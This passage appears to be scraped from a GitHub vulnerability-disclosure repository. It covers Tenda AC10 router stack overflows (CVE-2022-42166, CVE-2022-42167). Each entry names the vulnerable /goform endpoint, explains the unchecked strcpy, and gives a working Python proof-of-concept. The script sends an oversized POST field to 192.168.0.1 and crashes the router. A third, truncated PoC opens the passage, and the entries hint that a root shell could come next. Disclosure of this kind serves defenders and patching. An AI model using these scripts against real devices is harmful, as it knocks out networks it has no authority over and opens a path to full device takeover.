r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'speed\_dir=' + p1

p3 \= b"POST /goform/SetSpeedWan" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42166: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetFirewallCfg, firewall\_value is controllable and will be copied to firewall\_buf by strcpy. It is worth noting that there is no size check, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'firewallEn=' + p1

p3 \= b"POST /goform/SetFirewallCfg" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42167: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromSetIpMacBind.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetIpMacBind, The static\_list is controllable, it will assign the value to the list, and finally use strcpy to copy the list to mib\_buf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x1000
p2 \= b'list=' + p1

p3 \= b"POST /goform/SetIpMacBind" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

Tag

#intel